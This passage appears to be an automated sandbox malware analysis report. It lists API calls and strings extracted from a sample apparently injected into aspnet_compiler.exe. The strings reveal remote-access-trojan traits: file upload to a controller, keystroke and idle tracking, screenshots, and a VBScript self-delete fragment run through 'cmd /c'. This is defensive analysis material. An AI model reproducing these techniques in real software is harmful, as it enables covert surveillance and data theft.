                                                                          • String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe$del$open$BG$BG
                                                                          • API String ID: 1579085052-3709896694
                                                                          • Opcode ID: 8a4e8abcb5692669c638f214cb972068405fdb8eb26e88a62148626bb00c57e2
                                                                          • Instruction ID: b3868b96a5a73c1b880f625a38b4c220dd420420d05b0a2cc1e840e3cd02b35d
                                                                          • Opcode Fuzzy Hash: 8a4e8abcb5692669c638f214cb972068405fdb8eb26e88a62148626bb00c57e2
                                                                          • Instruction Fuzzy Hash: D251B0212043406BD609B722EC52EBF77999F81719F10443FF985A66E2DF3CAD4582EE
                                                                          APIs
                                                                          • lstrlenW.KERNEL32(?), ref: 0041B1D6
                                                                          • _memcmp.LIBVCRUNTIME ref: 0041B1EE
                                                                          • lstrlenW.KERNEL32(?), ref: 0041B207
                                                                          • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041B242
                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041B255
                                                                          • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041B299
                                                                          • lstrcmpW.KERNEL32(?,?), ref: 0041B2B4
                                                                          • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041B2CC
                                                                          • _wcslen.LIBCMT ref: 0041B2DB
                                                                          • FindVolumeClose.KERNEL32(?), ref: 0041B2FB
                                                                          • GetLastError.KERNEL32 ref: 0041B313
                                                                          • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041B340
                                                                          • lstrcatW.KERNEL32(?,?), ref: 0041B359
                                                                          • lstrcpyW.KERNEL32(?,?), ref: 0041B368
                                                                          • GetLastError.KERNEL32 ref: 0041B370
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                                          • String ID: ?
                                                                          • API String ID: 3941738427-1684325040
                                                                          • Opcode ID: d489e3e95fd4da7a256b353d04e65c95c699bf3c253225e66008eb700c534145
                                                                          • Instruction ID: 2e0df54dd889987763cd5022c3700ac4418931210c184d5857636408485aa128
                                                                          • Opcode Fuzzy Hash: d489e3e95fd4da7a256b353d04e65c95c699bf3c253225e66008eb700c534145
                                                                          • Instruction Fuzzy Hash: 8B416F71508305AAD7209FA1EC8C9EBB7E8EB49715F00096BF541C2261EB78C98887D6
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: _free$EnvironmentVariable$_wcschr
                                                                          • String ID:
                                                                          • API String ID: 3899193279-0
                                                                          • Opcode ID: 2326e67d315155b1cdbcdb335c3f1d7bcfd25c313196754d3a9c20ac7d0f0bef
                                                                          • Instruction ID: 8ac3cd9939a067627e1c481289c57a7f9f94b657261427fab31af25724b0c78e
                                                                          • Opcode Fuzzy Hash: 2326e67d315155b1cdbcdb335c3f1d7bcfd25c313196754d3a9c20ac7d0f0bef
                                                                          • Instruction Fuzzy Hash: 96D13C719007007FFB25AF7B9881A6F7BA4BF02314F0541AFF905A7381E63989418B9D
                                                                          APIs
                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00411C9A
                                                                            • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,00403A40), ref: 0041AB5F
                                                                            • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                                                            • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                                                          • Sleep.KERNEL32(0000000A,00465324), ref: 00411DEC
                                                                          • Sleep.KERNEL32(0000000A,00465324,00465324), ref: 00411E8E
                                                                          • Sleep.KERNEL32(0000000A,00465324,00465324,00465324), ref: 00411F30
                                                                          • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411F91
                                                                          • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411FC8
                                                                          • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00412004
                                                                          • Sleep.KERNEL32(000001F4,00465324,00465324,00465324), ref: 0041201E
                                                                          • Sleep.KERNEL32(00000064), ref: 00412060
                                                                            • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                                          • String ID: /stext "$HDG$HDG$>G$>G
                                                                          • API String ID: 1223786279-3931108886
                                                                          • Opcode ID: 36ecec2bd287229840889fa2f21ce4d309759ff1e99f2e4f361d0ee51ee9b760
                                                                          • Instruction ID: 1febf249a593eb43810efab42e14b6693ac358e03ba90545e56d33427da79e18
                                                                          • Opcode Fuzzy Hash: 36ecec2bd287229840889fa2f21ce4d309759ff1e99f2e4f361d0ee51ee9b760
                                                                          • Instruction Fuzzy Hash: 960243315083414AC325FB61D891AEFB7D5AFD4308F50493FF88A931E2EF785A49C69A
                                                                          APIs
                                                                          • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
                                                                          • LoadLibraryA.KERNEL32(?), ref: 00413EC8
                                                                          • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00413EEF
                                                                          • LoadLibraryA.KERNEL32(?), ref: 00413F27
                                                                          • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413F39
                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00413F40
                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00413F4F
                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00413F66
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                                          • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                                          • API String ID: 2490988753-744132762
                                                                          • Opcode ID: ba6e91efba9758633ea9bec27d31a254a4df24d425156724d9bfa6bc4db7eb59
                                                                          • Instruction ID: a4547f3d416e9253f7b1cbdd0907a67efdadb69b2b53743d1710677937ed8fa2
                                                                          • Opcode Fuzzy Hash: ba6e91efba9758633ea9bec27d31a254a4df24d425156724d9bfa6bc4db7eb59
                                                                          • Instruction Fuzzy Hash: 6D31C4B1906315A7D320AF25DC44ACBB7ECEF44745F400A2AF844D3201D778DA858AEE
                                                                          APIs
                                                                          • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041CAE9
                                                                          • GetCursorPos.USER32(?), ref: 0041CAF8
                                                                          • SetForegroundWindow.USER32(?), ref: 0041CB01
                                                                          • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041CB1B
                                                                          • Shell_NotifyIconA.SHELL32(00000002,00473B50), ref: 0041CB6C
                                                                          • ExitProcess.KERNEL32 ref: 0041CB74
                                                                          • CreatePopupMenu.USER32 ref: 0041CB7A
                                                                          • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041CB8F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                          • String ID: Close
                                                                          • API String ID: 1657328048-3535843008
                                                                          • Opcode ID: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                                          • Instruction ID: a66ed96c0d91d71762f770de87d5f41dd37c70c4e97b210e23d221b2b7ccacbc
                                                                          • Opcode Fuzzy Hash: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                                          • Instruction Fuzzy Hash: 68212B71188209FFDB064F64FD4EAAA3F65EB04342F044135B906D40B2D7B9EA90EB18
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: _free$Info
                                                                          • String ID:
                                                                          • API String ID: 2509303402-0
                                                                          • Opcode ID: 06a8a26f2c5a7b5fa394c6bff13e2c454eae2c5b2dbf51852f12c512b58d3eba
                                                                          • Instruction ID: 0af7f9009007d8880989bd470fdb3e4a62bb8e65dbd2af1b74ff5c8893cb1db7
                                                                          • Opcode Fuzzy Hash: 06a8a26f2c5a7b5fa394c6bff13e2c454eae2c5b2dbf51852f12c512b58d3eba
                                                                          • Instruction Fuzzy Hash: D0B18F71900605AFEF11DFA9C881BEEBBF4BF49304F14406EF855B7242DA79A8458B64
                                                                          APIs
                                                                          • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00407F4C
                                                                          • GetFileSizeEx.KERNEL32(00000000,00000000), ref: 00407FC2
                                                                          • __aulldiv.LIBCMT ref: 00407FE9
                                                                          • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 0040810D
                                                                          • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408128
                                                                          • CloseHandle.KERNEL32(00000000), ref: 00408200
                                                                          • CloseHandle.KERNEL32(00000000,00000052,00000000,?), ref: 0040821A
                                                                          • CloseHandle.KERNEL32(00000000), ref: 00408256
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: File$CloseHandle$CreatePointerReadSize__aulldiv
                                                                          • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $>G
                                                                          • API String ID: 1884690901-3066803209
                                                                          • Opcode ID: 7205d9af98df91b965123a054d585fa7c0d52e82773df9d6c890248cdbc6b411
                                                                          • Instruction ID: 222450ca6543349723abdfa1177da379b39b5876d7444fbb960ea0ab75079841
                                                                          • Opcode Fuzzy Hash: 7205d9af98df91b965123a054d585fa7c0d52e82773df9d6c890248cdbc6b411
                                                                          • Instruction Fuzzy Hash: DAB191316083409BC214FB25C892AAFB7E5AFD4314F40492EF885632D2EF789945C79B
                                                                          APIs
                                                                          • Sleep.KERNEL32(00001388), ref: 00409E62
                                                                            • Part of subcall function 00409D97: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                                            • Part of subcall function 00409D97: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                                            • Part of subcall function 00409D97: Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                                            • Part of subcall function 00409D97: CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                                                          • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00409E9E
                                                                          • GetFileAttributesW.KERNEL32(00000000), ref: 00409EAF
                                                                          • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00409EC6
                                                                          • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409F40
                                                                            • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B633
                                                                          • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00465900,00000000,00000000,00000000), ref: 0040A049
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                          • String ID: @CG$@CG$XCG$XCG$xAG$xAG
                                                                          • API String ID: 3795512280-3163867910
                                                                          • Opcode ID: 859471ff5ae44976aba126b0bcf56bf0f182264686a8061ac70fe12e31261d66
                                                                          • Instruction ID: b7dfc09a395f5416f32c5fe597dbb364f69b6ed32616efff49b152d1c9b912f4
                                                                          • Opcode Fuzzy Hash: 859471ff5ae44976aba126b0bcf56bf0f182264686a8061ac70fe12e31261d66
                                                                          • Instruction Fuzzy Hash: 30518D716043005ACB05BB72D866ABF769AAFD1309F00053FF886B71E2DF3D9D44869A
                                                                          APIs
                                                                          • ___free_lconv_mon.LIBCMT ref: 004500B1
                                                                            • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F300
                                                                            • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F312
                                                                            • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F324
                                                                            • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F336
                                                                            • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F348
                                                                            • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F35A
                                                                            • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F36C
                                                                            • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F37E
                                                                            • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F390
                                                                            • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3A2
                                                                            • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3B4
                                                                            • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3C6
                                                                            • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3D8
                                                                          • _free.LIBCMT ref: 004500A6
                                                                            • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                                            • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                                          • _free.LIBCMT ref: 004500C8
                                                                          • _free.LIBCMT ref: 004500DD
                                                                          • _free.LIBCMT ref: 004500E8
                                                                          • _free.LIBCMT ref: 0045010A
                                                                          • _free.LIBCMT ref: 0045011D
                                                                          • _free.LIBCMT ref: 0045012B
                                                                          • _free.LIBCMT ref: 00450136
                                                                          • _free.LIBCMT ref: 0045016E
                                                                          • _free.LIBCMT ref: 00450175
                                                                          • _free.LIBCMT ref: 00450192
                                                                          • _free.LIBCMT ref: 004501AA
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                          • String ID:
                                                                          • API String ID: 161543041-0
                                                                          • Opcode ID: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                                          • Instruction ID: 6df0fc8d0da410edbfddc8482cd9dc810a80ebbb5b2f86b8c24a0bb33e3d08c7
                                                                          • Opcode Fuzzy Hash: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                                          • Instruction Fuzzy Hash: 96317235500B00AFEB20AA35D845B5B73E5AF42355F15841FF849E7292DF39AC98CB1A
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 0041912D
                                                                          • GdiplusStartup.GDIPLUS(00473AF0,?,00000000), ref: 0041915F
                                                                          • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 004191EB
                                                                          • Sleep.KERNEL32(000003E8), ref: 0041926D
                                                                          • GetLocalTime.KERNEL32(?), ref: 0041927C
                                                                          • Sleep.KERNEL32(00000000,00000018,00000000), ref: 00419365
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                                          • String ID: XCG$XCG$XCG$time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                                                          • API String ID: 489098229-65789007
                                                                          • Opcode ID: a8f8b58d2128b4f531cd6f97798560ad721fb8e33840202611e7dd41891fb402
                                                                          • Instruction ID: b922dce7c629cfc9b1bb11cb74a08c0e3353b39699bf4d86e46594d10c943285
                                                                          • Opcode Fuzzy Hash: a8f8b58d2128b4f531cd6f97798560ad721fb8e33840202611e7dd41891fb402
                                                                          • Instruction Fuzzy Hash: 33519F71A002449ACB14BBB5C856AFE7BA9AB55304F00407FF84AB71D2EF3C5E85C799
                                                                          APIs
                                                                          • connect.WS2_32(?,?,?), ref: 004042A5
                                                                          • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043CB
                                                                          • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043D5
                                                                          • WSAGetLastError.WS2_32(?,?,?,0040192B), ref: 004043E7
                                                                            • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                          • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                          • API String ID: 994465650-2151626615
                                                                          • Opcode ID: 62f3c4882b49c5ff5d63aa71430f88bee7d31ae11dd357ee521aebef95a1510e
                                                                          • Instruction ID: b196b808fbc66b1ac8da6b4b51d7f626a0d3d22bc4cde50e21f83cd2c7739b74
                                                                          • Opcode Fuzzy Hash: 62f3c4882b49c5ff5d63aa71430f88bee7d31ae11dd357ee521aebef95a1510e
                                                                          • Instruction Fuzzy Hash: ED4128B1B00202A7CB04B77A8C5B66D7A55AB81368B40007FF901676D3EE7DAD6087DF
                                                                          APIs
                                                                            • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,?,0040C67D), ref: 004116A9
                                                                            • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF,?,0040C67D), ref: 004116BC
                                                                            • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 00412679
                                                                            • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 00412692
                                                                            • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(?), ref: 0041269D
                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C6C7
                                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C826
                                                                          • ExitProcess.KERNEL32 ref: 0040C832
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                                          • String ID: """, 0$.vbs$@CG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                                          • API String ID: 1913171305-390638927
                                                                          • Opcode ID: ca681db5516d972aef640dc773a40398a070aaf6ba3dfca6e9b2ec7f30141ac0
                                                                          • Instruction ID: a795a6540db69397e2c5d2b70f340dd787df27bacd58b350937fb1c0aad7b7c4
                                                                          • Opcode Fuzzy Hash: ca681db5516d972aef640dc773a40398a070aaf6ba3dfca6e9b2ec7f30141ac0
                                                                          • Instruction Fuzzy Hash: A2416D329001185ACB14F762DC56DFE7779AF50718F50417FF906B30E2EE386A8ACA99
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: _free
                                                                          • String ID:
                                                                          • API String ID: 269201875-0
                                                                          • Opcode ID: 53d41fd9a7ee4e2989e4925aa528ca2cb03ad0a377c341b032d8e4e6b559b5a3
                                                                          • Instruction ID: 48066223020562dfe8895eb3edc0e70975ef38ab3c96fc6f1fb07286cb8ca08d
                                                                          • Opcode Fuzzy Hash: 53d41fd9a7ee4e2989e4925aa528ca2cb03ad0a377c341b032d8e4e6b559b5a3
                                                                          • Instruction Fuzzy Hash: 2BC15772D80204BFEB20DBA9CC82FDE77F89B45704F15416AFA04FB282D6749D458B58
                                                                          APIs
                                                                            • Part of subcall function 00454650: CreateFileW.KERNEL32(00000000,?,?,+JE,?,?,00000000,?,00454A2B,00000000,0000000C), ref: 0045466D
                                                                          • GetLastError.KERNEL32 ref: 00454A96
                                                                          • __dosmaperr.LIBCMT ref: 00454A9D
                                                                          • GetFileType.KERNEL32(00000000), ref: 00454AA9
                                                                          • GetLastError.KERNEL32 ref: 00454AB3
                                                                          • __dosmaperr.LIBCMT ref: 00454ABC
                                                                          • CloseHandle.KERNEL32(00000000), ref: 00454ADC
                                                                          • CloseHandle.KERNEL32(?), ref: 00454C26
                                                                          • GetLastError.KERNEL32 ref: 00454C58
                                                                          • __dosmaperr.LIBCMT ref: 00454C5F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                          • String ID: H
                                                                          • API String ID: 4237864984-2852464175
                                                                          • Opcode ID: b64a76ded07e6414476391b57ad8ab2edcfe93df9d200e18b46d3283e817940b
                                                                          • Instruction ID: 324c09394b40af715295ff654573b8bda7a64cd12b4111e7ce26936e53f9a861
                                                                          • Opcode Fuzzy Hash: b64a76ded07e6414476391b57ad8ab2edcfe93df9d200e18b46d3283e817940b
                                                                          • Instruction Fuzzy Hash: B0A148329041044FDF19EF78D8427AE7BA0AB86319F14015EFC159F392DB398C86C75A
                                                                          APIs
                                                                          • __Init_thread_footer.LIBCMT ref: 0040A456
                                                                          • Sleep.KERNEL32(000001F4), ref: 0040A461
                                                                          • GetForegroundWindow.USER32 ref: 0040A467
                                                                          • GetWindowTextLengthW.USER32(00000000), ref: 0040A470
                                                                          • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040A4A4
                                                                          • Sleep.KERNEL32(000003E8), ref: 0040A574
                                                                            • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                                          • String ID: [${ User has been idle for $ minutes }$]
                                                                          • API String ID: 911427763-3954389425
                                                                          • Opcode ID: a59f2f13793784003892e63950edf61f9792dfbe12456e4cbfe946a207096c8a
                                                                          • Instruction ID: 0ecdfa35f4bf358d0b6072dbfc0ad8fc4f94b2a12b5a089c7f39fa9b67fb4d59
                                                                          • Opcode Fuzzy Hash: a59f2f13793784003892e63950edf61f9792dfbe12456e4cbfe946a207096c8a
                                                                          • Instruction Fuzzy Hash: C451DF316083005BC614FB21D84AAAE7794BF84318F50493FF846A62E2EF7C9E55C69F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 65535$udp
                                                                          • API String ID: 0-1267037602
                                                                          • Opcode ID: dd6860ede333d1e13d8ba8fd5b9e65b3a11d6160404ba42ca097fcd4ed7c504e
                                                                          • Instruction ID: a76ad32841e4dbbb66723cf4e0556afe3febbbe66cdf8f55616d13ac9502c32b
                                                                          • Opcode Fuzzy Hash: dd6860ede333d1e13d8ba8fd5b9e65b3a11d6160404ba42ca097fcd4ed7c504e
                                                                          • Instruction Fuzzy Hash: 9D4118716083019BD7209F29E905BAB7BD8EF85706F04082FF84197391E76DCEC186AE
                                                                          APIs
                                                                          • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040CA04
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: LongNamePath
                                                                          • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                          • API String ID: 82841172-425784914
                                                                          • Opcode ID: 2c32c8423f05266584aa4a08fe5fa9c2e4569a415b98fb848e0406cdb68be249
                                                                          • Instruction ID: 51cedb133b73bca78a9fc1065318242b3d6e678e936cb09da4a185c9a299c852
                                                                          • Opcode Fuzzy Hash: 2c32c8423f05266584aa4a08fe5fa9c2e4569a415b98fb848e0406cdb68be249
                                                                          • Instruction Fuzzy Hash: 39413A721442009BC214FB21DD96DAFB7A4AE90759F10063FB546720E2EE7CAA49C69F
                                                                          APIs
                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393B9
                                                                          • GetLastError.KERNEL32(?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393C6
                                                                          • __dosmaperr.LIBCMT ref: 004393CD
                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393F9
                                                                          • GetLastError.KERNEL32(?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439403
                                                                          • __dosmaperr.LIBCMT ref: 0043940A
                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401AD8,?), ref: 0043944D
                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439457
                                                                          • __dosmaperr.LIBCMT ref: 0043945E
                                                                          • _free.LIBCMT ref: 0043946A
                                                                          • _free.LIBCMT ref: 00439471
                                                                          Memory Dump Source
